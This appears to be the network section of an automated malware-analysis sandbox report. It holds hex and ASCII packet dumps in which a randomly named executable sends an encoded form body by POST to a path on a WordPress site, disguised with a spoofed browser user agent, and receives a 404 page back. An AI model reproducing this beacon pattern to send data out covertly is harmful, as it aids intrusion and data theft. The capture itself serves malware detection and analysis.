                                                                        Data Raw: 34 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 72 75 2d 52 55 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 61 6c 74 72 61 6c 6f 67 6f 73 2e 63 6f 6d 2f 78 6d 6c 72 70 63 2e 70 68 70 22 3e 0a 0a 09 09 09 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 4d 53 49 6e 70 75 74 4d 65 74 68 6f 64 43 6f 6e 74 65 78 74 20 26 26 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 4d 6f 64 65 20 26 26 20 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 27 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 61 6c 74 72 61 6c 6f 67 6f 73 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 77 6f 6f 64 6d 61 72 74 2f 6a 73 2f 6c 69 62 73 2f 69 65 31 31 43 75 73 74 6f 6d 50 72 6f 70 65 72 74 69 65 73 2e 6d 69 6e 2e 6a 73 22 3e 3c 5c 2f 73 63 72 69 70 74 3e 27 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 50 72 65 6d 69 75 6d 20 70 6c 75 67 69 6e 20 76 31 39 2e 32 2e 31 20 28 59 6f 61 73 74 20 53 45 4f 20 76 31 39 2e 36 2e 31 29 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e 73 2f 73 65 6f 2f 20 2d 2d 3e 0a 09 3c 74 69 74 6c 65 3e d0 a1 d1 82 d1 80 d0 b0 d0 bd d0 b8 d1 86 d0 b0 20 d0 bd d0 b5 20 d0 bd d0 b0 d0 b9 d0 b4 d0 b5 d0 bd d0 b0 20 7c 20 41 6c 74 72 61 6c 6f 67 6f 73 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 72 75 5f 52 55 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 d0 a1 d1 82 d1 80 d0 b0 d0 bd d0 b8 d1 86 d0 b0 20 d0 bd d0 b5 20 d0 bd d0 b0 d0 b9 d0 b4 d0 b5 d0 bd d0 b0 20 7c 20 41 6c 74 72 61 6c 6f 67 6f 73 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 73 69 74 65 5f 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 41 6c 74 72 61 6c 6f 67 6f 73 22 20 2f 3e 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6c 64 2b 6a 73 6f 6e 22 20 63 6c 61 73 73 3d 22 79 6f 61 73 74 2d 73 63 68 65 6d 61 2d 67 72 61 70 68 22 3e 7b 22
                                                                        Data Ascii: 4000<!DOCTYPE html><html lang="ru-RU"><head><meta charset="UTF-8"><link rel="profile" href="https://gmpg.org/xfn/11"><link rel="pingback" href="http://altralogos.com/xmlrpc.php"><script>window.MSInputMethodContext && document.documentMode && document.write('<script src="http://altralogos.com/wp-content/themes/woodmart/js/libs/ie11CustomProperties.min.js"><\/script>');</script><meta name='robots' content='noindex, follow' />... This site is optimized with the Yoast SEO Premium plugin v19.2.1 (Yoast SEO v19.6.1) - https://yoast.com/wordpress/plugins/seo/ --><title> | Altralogos</title><meta property="og:locale" content="ru_RU" /><meta property="og:title" content=" | Altralogos" /><meta property="og:site_name" content="Altralogos" /><script type="application/ld+json" class="yoast-schema-graph">{"
                                                                        Dec 2, 2023 18:51:54.575974941 CET1340INData Raw: 40 63 6f 6e 74 65 78 74 22 3a 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 22 2c 22 40 67 72 61 70 68 22 3a 5b 7b 22 40 74 79 70 65 22 3a 22 57 65 62 53 69 74 65 22 2c 22 40 69 64 22 3a 22 68 74 74 70 73 3a 2f 2f 61 6c 74 72 61 6c 6f
                                                                        Data Ascii: @context":"https://schema.org","@graph":[{"@type":"WebSite","@id":"https://altralogos.com/#website","url":"https://altralogos.com/","name":"Altralogos","description":"Altralogos","potentialAction":[{"@type":"SearchAction","target":{"@type":"En
                                                                        Dec 2, 2023 18:51:54.575989008 CET1340INData Raw: 2e 31 32 35 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 66 69 6c 65 5f 5f 62 75 74 74 6f 6e 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 33 32 33 37 33 63 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 0a
                                                                        Data Ascii: .125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><link rel='stylesheet' id='elementor-icons-css' href='http://altralogos.com/wp-content/plugins/elementor/assets/lib/eicons/css/elementor-icons.min.css?v
                                                                        Dec 2, 2023 18:51:54.576003075 CET1340INData Raw: 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 77 64 2d 62 61 73 65 2d 64 65 70 72 65 63 61 74 65 64 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 61 6c
                                                                        Data Ascii: media='all' /><link rel='stylesheet' id='wd-base-deprecated-css' href='http://altralogos.com/wp-content/themes/woodmart/css/parts/base-deprecated.min.css?ver=6.5.4' type='text/css' media='all' /><link rel='stylesheet' id='wd-elementor-base-
                                                                        Dec 2, 2023 18:51:54.576016903 CET1340INData Raw: 27 20 69 64 3d 27 77 64 2d 70 61 67 65 2d 74 69 74 6c 65 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 61 6c 74 72 61 6c 6f 67 6f 73 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 77 6f 6f 64 6d 61 72 74 2f 63 73
                                                                        Data Ascii: ' id='wd-page-title-css' href='http://altralogos.com/wp-content/themes/woodmart/css/parts/page-title.min.css?ver=6.5.4' type='text/css' media='all' /><link rel='stylesheet' id='wd-wd-search-form-css' href='http://altralogos.com/wp-content/the
                                                                        Dec 2, 2023 18:51:54.576030970 CET1340INData Raw: 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 77 6f 6f 64 6d 61 72 74 2f 63 73 73 2f 70 61 72 74 73 2f 6f 70 74 2d 73 63 72 6f 6c 6c 74 6f 74 6f 70 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 36 2e 35 2e 34 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63
                                                                        Data Ascii: -content/themes/woodmart/css/parts/opt-scrolltotop.min.css?ver=6.5.4' type='text/css' media='all' /><link rel='stylesheet' id='xts-google-fonts-css' href='https://fonts.googleapis.com/css?family=Inter%3A400%2C600%2C300%7CPlayfair+Display%3A40
                                                                        Dec 2, 2023 18:51:54.576045036 CET1340INData Raw: 49 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 64 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 52 53 44 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 6c 74 72 61 6c 6f 67 6f 73 2e 63 6f 6d 2f 78 6d 6c 72 70 63 2e 70 68 70 3f
                                                                        Data Ascii: I" type="application/rsd+xml" title="RSD" href="https://altralogos.com/xmlrpc.php?rsd" /><meta name="generator" content="WordPress 6.4.1" /><meta name="theme-color" content="rgb(1,34,31)"><meta name="viewport" content="width=device-widt
                                                                        Dec 2, 2023 18:51:54.576056957 CET1340INData Raw: 70 3a 20 2d 30 70 78 3b 0a 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 2d 30 70 78 3b 0a 09 68 65 69 67 68 74 3a 20 63 61 6c 63 28 31 30 30 25 20 2b 20 30 70 78 29 3b 0a 7d 0a 0a 0a 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 31
                                                                        Data Ascii: p: -0px;margin-bottom: -0px;height: calc(100% + 0px);}@media (min-width: 1025px) {.whb-top-bar-inner {height: 80px;max-height: 80px;}.whb-sticked .whb-top-bar-inner {height: 40px;max-height: 40px;}.whb-he
                                                                        Dec 2, 2023 18:51:54.576070070 CET1340INData Raw: 6c 61 79 22 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 2d 2d 77 64 2d 74 69 74 6c 65 2d 66 6f 6e 74 2d 77 65 69 67 68 74 3a 36 30 30 3b 0a 2d 2d 77 64 2d 74 69 74 6c 65 2d 63 6f 6c 6f 72 3a 23
                                                                        Data Ascii: lay", Arial, Helvetica, sans-serif;--wd-title-font-weight:600;--wd-title-color:#242424;}:root{--wd-entities-title-font:"Playfair Display", Arial, Helvetica, sans-serif;--wd-entities-title-font-weight:700;--wd-entities-title-color:#33333
                                                                        Dec 2, 2023 18:51:54.576082945 CET1340INData Raw: 74 7b 0a 2d 2d 6e 6f 74 69 63 65 73 2d 73 75 63 63 65 73 73 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 0a 7d 0a 3a 72 6f 6f 74 7b 0a 2d 2d 6e 6f 74 69 63 65 73 2d 77 61 72 6e 69 6e 67 2d 62 67 3a 72 67 62 28 32 32 35 2c 31 31 33 2c 36 35 29 3b 0a 7d 0a
                                                                        Data Ascii: t{--notices-success-color:#fff;}:root{--notices-warning-bg:rgb(225,113,65);}:root{--notices-warning-color:#fff;}:root{--wd-form-brd-radius: 35px;--wd-form-brd-width: 2px;--btn-default-color: #ff
                                                                        Dec 2, 2023 18:51:54.759723902 CET1340INData Raw: 6e 2e 77 64 2d 73 65 63 74 69 6f 6e 2d 73 74 72 65 74 63 68 20 3e 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 63 6f 6c 75 6d 6e 2d 67 61 70 2d 64 65 66 61 75 6c 74 20 7b 0a 09 09 09 6d 61 78 2d 77 69 64 74 68 3a 20 31 32 31 32 70 78 3b 0a 09 09 7d 0a 09
                                                                        Data Ascii: n.wd-section-stretch > .elementor-column-gap-default {max-width: 1212px;}.elementor-section.wd-section-stretch > .elementor-column-gap-extended {max-width: 1222px;}.elementor-section.wd-section-stretch > .elementor-column-g


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        43192.168.2.1049755185.74.252.11805828C:\Program Files (x86)\lYJnPbGqvAsrVBzAPcNbjhtdadsuOwdLkJkdJlTqjCthtZqXvtQtzjRONIHEsNRRIFDhSny\qNENczArVjafOgvC.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 2, 2023 18:51:56.129822969 CET1825OUTPOST /ahec/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Host: www.altralogos.com
                                                                        Origin: http://www.altralogos.com
                                                                        Referer: http://www.altralogos.com/ahec/
                                                                        Cache-Control: no-cache
                                                                        Content-Length: 1215
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                        Data Raw: 4f 74 3d 36 6e 41 59 31 70 77 4a 75 72 46 33 6c 34 6c 74 73 47 30 6a 65 79 2f 32 5a 41 4e 64 6e 75 70 76 5a 5a 38 67 4e 43 57 31 57 44 6f 6d 6d 6c 7a 39 4d 6e 6c 6a 71 4a 33 57 4d 6f 6e 58 34 51 48 35 51 64 31 37 53 45 6d 64 38 79 32 31 45 55 61 66 36 7a 57 50 49 71 54 70 4f 4e 57 67 57 58 39 4e 61 75 4c 50 6b 37 5a 62 6a 4c 44 66 6c 7a 63 39 35 67 36 2f 5a 4a 45 38 4c 6c 33 30 46 46 46 6f 68 72 49 62 30 71 44 63 73 58 59 6c 4f 73 52 4d 39 6d 58 39 76 72 34 5a 47 61 75 49 53 67 66 4e 2f 6b 6e 30 73 42 5a 41 6b 4a 79 5a 69 74 4c 42 58 51 62 2f 35 72 33 65 65 68 35 7a 50 4d 33 4a 56 4e 4d 71 55 66 6e 5a 35 54 63 2b 6e 56 46 65 56 57 79 34 73 53 51 34 37 33 77 66 67 5a 54 67 59 53 72 2b 52 33 64 35 45 4b 55 30 37 66 6a 58 59 57 77 45 4c 62 31 6e 58 34 2b 57 61 76 38 37 4d 70 49 31 44 32 47 39 34 44 46 56 35 71 7a 68 48 2f 31 34 76 46 55 75 30 6b 30 4f 67 71 52 36 47 53 72 69 74 66 69 72 74 69 43 71 55 53 43 4c 77 33 48 53 50 42 50 71 56 52 2f 64 33 49 79 67 31 63 56 68 52 75 73 72 6b 52 43 36 43 54 47 7a 68 72 73 79 45 4b 69 4c 59 50 39 4d 51 54 4c 63 33 49 69 61 6d 73 39 30 69 46 72 72 53 53 35 58 36 2f 55 74 50 36 55 74 76 53 4c 6f 63 46 65 61 68 54 33 7a 6a 52 63 45 74 39 36 6e 42 4a 42 4c 30 4a 4e 47 34 72 36 4a 35 54 45 46 4d 6c 51 51 70 69 50 41 4a 42 51 6e 45 6f 66 37 51 46 49 58 57 4b 56 57 68 31 49 61 34 33 78 38 50 5a 62 78 5a 52 57 6b 78 62 50 32 38 4c 37 4f 5a 39 39 47 74 31 41 50 4d 34 46 42 67 70 35 73 6e 79 4e 36 72 62 78 6d 4b 73 32 6d 52 5a 49 6e 55 4a 6c 4a 33 6d 4a 35 43 33 56 2f 2b 75 50 4e 66 34 43 47 79 58 32 77 5a 47 33 61 39 33 47 73 34 35 73 43 74 6d 68 42 38 45 71 47 35 46 4f 77 48 35 39 51 4f 33 6f 59 57 4f 4d 54 43 6b 78 34 66 2f 73 35 58 56 71 31 64 6e 46 31 2f 51 6f 32 4f 76 5a 43 4d 76 6a 68 66 6a 39 78 78 64 64 4e 47 36 52 53 53 79 74 41 73 62 31 4f 6f 65 65 5a 70 32 54 31 69 55 5a 32 35 5a 4f 58 67 51 4b 6a 76 50 49 71 4e 68 47 67 56 77 72 6a 2b 73 33 70 37 4f 57 46 77 66 6c 44 57 6a 58 57 4c 46 4b 57 64 79 75 38 72 37 4d 42 36 41 37 47 2f 65 65 64 47 78 79 73 4d 69 4a 69 4c 46 34 76 65 7a 76 6c 77 49 34 58 52 44 67 47 56 67 45 2b 63 55 57 64 51 4a 33 72 6f 46 77 6d 62 62 4b 30 55 7a 41 32 56 6e 6d 6d 35 72 61 42 6d 78 32 6a 5a 68 58 48 32 59 51 4e 67 6c 46 57 70 54 44 50 6a 73 78 76 41 6e 72 58 38 75 68 48 68 31 4a 41 79 64 32 57 4f 65 73 38 43 79 4d 35 31 6c 39 61 6b 74 75 79 45 76 6c 5a 62 46 4c 74 42 6c 44 47 74 35 61 44 43 42 76 77 56 33 4f 4f 77 6a 68 56 53 68 4d 55 4d 53 46 42 69 6c 4b 6b 37 6b 33 52 74 64 39 56 79 78 66 61 37 43 33 4c 2f 55 59 6b 41 36 65 57 6c 6a 71 4b 43 75 69 4e 76 76 41 71 2f 52 4d 42 52 7a 2f 6b 65 78 4e 47 74 76 43 2b 37 6e 33 63 71 54 76 69 34 34 65 37 67 34 59 50 36 34 2f 62 56 73 53 63 31 49 63 48 74 43 63 68 2f 4b 46 34 7a 74 50 77 54 73 72 73 57 6e 6c 4e 43 6f 6c 57 68 56 48 43 6b 32 74 54 44 59 70 55 4a 54 4c 75 6e 30 43 75 4e 6b 47 70 4a 66 30 50 47 34 54 6f 55 52 79 47 30 59 67 56 66 58 76 52 31 65 56 69 58 76 6b 75 48 52 48 2b 58 4a 68 32 31 73 64 44 68 50 49 4d 62 4b 68 43 37 4f 63 34 39 78 7a 4f 47 57 61 39 61 35 30 58 59 75 66 42 33 62 54 49 36 58 78 75 67 41 31 55 70 58 32 39 53 58 36 47 6a 55 64 51 79 63 35 65 70 6c 78 76 70 6d 70 37 50 46 39 4f 62 50 31 48 52 57 45 45 73 30 50 56 58 6b 71 44 46 65 31 4d 54 44 34 42 46 66 64 74 78 4c 4e 44 53 67 57 62 72 49 38 4d 76 59 72 76 46 73 50 30 57 58 59 4f 6a 67 4f 6f 67 6c 42 33 46 34 46 49 71 4d 37 2b 56 67 68 4f 2f 57 33 2b 7a 6b 42 77 65 6f 37 36 54 4c 54 50 5a 56 67 70 57 34 5a 67 75 78 47 69 56 48 39 76 71 42 72 51 64 76 48 5a 59 4a 49 63 51 6d 51 76 2b 55 64 77 77 61 65 75 47 68 4d 75 32 50 59 7a 31 72 2f 42 65 33 57 4a 74 6b 75 59 4e 76 59 34 52 68 2b 2f
                                                                        Data Ascii: Ot=6nAY1pwJurF3l4ltsG0jey/2ZANdnupvZZ8gNCW1WDommlz9MnljqJ3WMonX4QH5Qd17SEmd8y21EUaf6zWPIqTpONWgWX9NauLPk7ZbjLDflzc95g6/ZJE8Ll30FFFohrIb0qDcsXYlOsRM9mX9vr4ZGauISgfN/kn0sBZAkJyZitLBXQb/5r3eeh5zPM3JVNMqUfnZ5Tc+nVFeVWy4sSQ473wfgZTgYSr+R3d5EKU07fjXYWwELb1nX4+Wav87MpI1D2G94DFV5qzhH/14vFUu0k0OgqR6GSritfirtiCqUSCLw3HSPBPqVR/d3Iyg1cVhRusrkRC6CTGzhrsyEKiLYP9MQTLc3Iiams90iFrrSS5X6/UtP6UtvSLocFeahT3zjRcEt96nBJBL0JNG4r6J5TEFMlQQpiPAJBQnEof7QFIXWKVWh1Ia43x8PZbxZRWkxbP28L7OZ99Gt1APM4FBgp5snyN6rbxmKs2mRZInUJlJ3mJ5C3V/+uPNf4CGyX2wZG3a93Gs45sCtmhB8EqG5FOwH59QO3oYWOMTCkx4f/s5XVq1dnF1/Qo2OvZCMvjhfj9xxddNG6RSSytAsb1OoeeZp2T1iUZ25ZOXgQKjvPIqNhGgVwrj+s3p7OWFwflDWjXWLFKWdyu8r7MB6A7G/eedGxysMiJiLF4vezvlwI4XRDgGVgE+cUWdQJ3roFwmbbK0UzA2Vnmm5raBmx2jZhXH2YQNglFWpTDPjsxvAnrX8uhHh1JAyd2WOes8CyM51l9aktuyEvlZbFLtBlDGt5aDCBvwV3OOwjhVShMUMSFBilKk7k3Rtd9Vyxfa7C3L/UYkA6eWljqKCuiNvvAq/RMBRz/kexNGtvC+7n3cqTvi44e7g4YP64/bVsSc1IcHtCch/KF4ztPwTsrsWnlNColWhVHCk2tTDYpUJTLun0CuNkGpJf0PG4ToURyG0YgVfXvR1eViXvkuHRH+XJh21sdDhPIMbKhC7Oc49xzOGWa9a50XYufB3bTI6XxugA1UpX29SX6GjUdQyc5eplxvpmp7PF9ObP1HRWEEs0PVXkqDFe1MTD4BFfdtxLNDSgWbrI8MvYrvFsP0WXYOjgOoglB3F4FIqM7+VghO/W3+zkBweo76TLTPZVgpW4ZguxGiVH9vqBrQdvHZYJIcQmQv+UdwwaeuGhMu2PYz1r/Be3WJtkuYNvY4Rh+/
                                                                        Dec 2, 2023 18:51:57.526902914 CET1340INHTTP/1.1 404 Not Found
                                                                        Date: Sat, 02 Dec 2023 17:51:55 GMT
                                                                        Server: Apache
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                        Cache-Control: no-cache, must-revalidate, max-age=0
                                                                        Link: <https://altralogos.com/wp-json/>; rel="https://api.w.org/"
                                                                        Upgrade: h2,h2c
                                                                        Connection: Upgrade, close
                                                                        Transfer-Encoding: chunked
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Data Raw: 34 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 72 75 2d 52 55 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 61 6c 74 72 61 6c 6f 67 6f 73 2e 63 6f 6d 2f 78 6d 6c 72 70 63 2e 70 68 70 22 3e 0a 0a 09 09 09 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 4d 53 49 6e 70 75 74 4d 65 74 68 6f 64 43 6f 6e 74 65 78 74 20 26 26 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 4d 6f 64 65 20 26 26 20 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 27 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 61 6c 74 72 61 6c 6f 67 6f 73 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 77 6f 6f 64 6d 61 72 74 2f 6a 73 2f 6c 69 62 73 2f 69 65 31 31 43 75 73 74 6f 6d 50 72 6f 70 65 72 74 69 65 73 2e 6d 69 6e 2e 6a 73 22 3e 3c 5c 2f 73 63 72 69 70 74 3e 27 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 50 72 65 6d 69 75 6d 20 70 6c 75 67 69 6e 20 76 31 39 2e 32 2e 31 20 28 59 6f 61 73 74 20 53 45 4f 20 76 31 39 2e 36 2e 31 29 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e 73 2f 73 65 6f 2f 20 2d 2d 3e 0a 09 3c 74 69 74 6c 65 3e d0 a1 d1 82 d1 80 d0 b0 d0 bd d0 b8 d1 86 d0 b0 20 d0 bd d0 b5 20 d0 bd d0 b0 d0 b9 d0 b4 d0 b5 d0 bd d0 b0 20 7c 20 41 6c 74 72 61 6c 6f 67 6f 73 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 72 75 5f 52 55 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 d0 a1 d1 82 d1 80 d0 b0 d0 bd d0 b8 d1 86 d0 b0 20 d0 bd d0 b5 20 d0 bd d0 b0 d0 b9 d0 b4 d0 b5 d0 bd d0 b0 20 7c 20 41 6c 74 72 61 6c 6f 67 6f 73 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 73 69 74 65 5f 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 41 6c 74 72 61 6c 6f 67 6f 73 22 20 2f 3e 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6c 64 2b 6a 73 6f 6e 22 20 63 6c 61 73 73 3d 22 79 6f 61 73 74 2d 73 63 68 65 6d 61 2d 67 72 61 70 68 22 3e 7b 22
                                                                        Data Ascii: 4000<!DOCTYPE html><html lang="ru-RU"><head><meta charset="UTF-8"><link rel="profile" href="https://gmpg.org/xfn/11"><link rel="pingback" href="http://altralogos.com/xmlrpc.php"><script>window.MSInputMethodContext && document.documentMode && document.write('<script src="http://altralogos.com/wp-content/themes/woodmart/js/libs/ie11CustomProperties.min.js"><\/script>');</script><meta name='robots' content='noindex, follow' />... This site is optimized with the Yoast SEO Premium plugin v19.2.1 (Yoast SEO v19.6.1) - https://yoast.com/wordpress/plugins/seo/ --><title> | Altralogos</title><meta property="og:locale" content="ru_RU" /><meta property="og:title" content=" | Altralogos" /><meta property="og:site_name" content="Altralogos" /><script type="application/ld+json" class="yoast-schema-graph">{"
                                                                        Dec 2, 2023 18:51:57.526925087 CET1340INData Raw: 40 63 6f 6e 74 65 78 74 22 3a 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 22 2c 22 40 67 72 61 70 68 22 3a 5b 7b 22 40 74 79 70 65 22 3a 22 57 65 62 53 69 74 65 22 2c 22 40 69 64 22 3a 22 68 74 74 70 73 3a 2f 2f 61 6c 74 72 61 6c 6f
                                                                        Data Ascii: @context":"https://schema.org","@graph":[{"@type":"WebSite","@id":"https://altralogos.com/#website","url":"https://altralogos.com/","name":"Altralogos","description":"Altralogos","potentialAction":[{"@type":"SearchAction","target":{"@type":"En
                                                                        Dec 2, 2023 18:51:57.526937008 CET1340INData Raw: 2e 31 32 35 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 66 69 6c 65 5f 5f 62 75 74 74 6f 6e 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 33 32 33 37 33 63 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 0a
                                                                        Data Ascii: .125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><link rel='stylesheet' id='elementor-icons-css' href='http://altralogos.com/wp-content/plugins/elementor/assets/lib/eicons/css/elementor-icons.min.css?v
                                                                        Dec 2, 2023 18:51:57.526949883 CET1340INData Raw: 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 77 64 2d 62 61 73 65 2d 64 65 70 72 65 63 61 74 65 64 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 61 6c
                                                                        Data Ascii: media='all' /><link rel='stylesheet' id='wd-base-deprecated-css' href='http://altralogos.com/wp-content/themes/woodmart/css/parts/base-deprecated.min.css?ver=6.5.4' type='text/css' media='all' /><link rel='stylesheet' id='wd-elementor-base-
                                                                        Dec 2, 2023 18:51:57.527004004 CET1340INData Raw: 27 20 69 64 3d 27 77 64 2d 70 61 67 65 2d 74 69 74 6c 65 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 61 6c 74 72 61 6c 6f 67 6f 73 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 77 6f 6f 64 6d 61 72 74 2f 63 73
                                                                        Data Ascii: ' id='wd-page-title-css' href='http://altralogos.com/wp-content/themes/woodmart/css/parts/page-title.min.css?ver=6.5.4' type='text/css' media='all' /><link rel='stylesheet' id='wd-wd-search-form-css' href='http://altralogos.com/wp-content/the
                                                                        Dec 2, 2023 18:51:57.527018070 CET1340INData Raw: 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 77 6f 6f 64 6d 61 72 74 2f 63 73 73 2f 70 61 72 74 73 2f 6f 70 74 2d 73 63 72 6f 6c 6c 74 6f 74 6f 70 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 36 2e 35 2e 34 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63
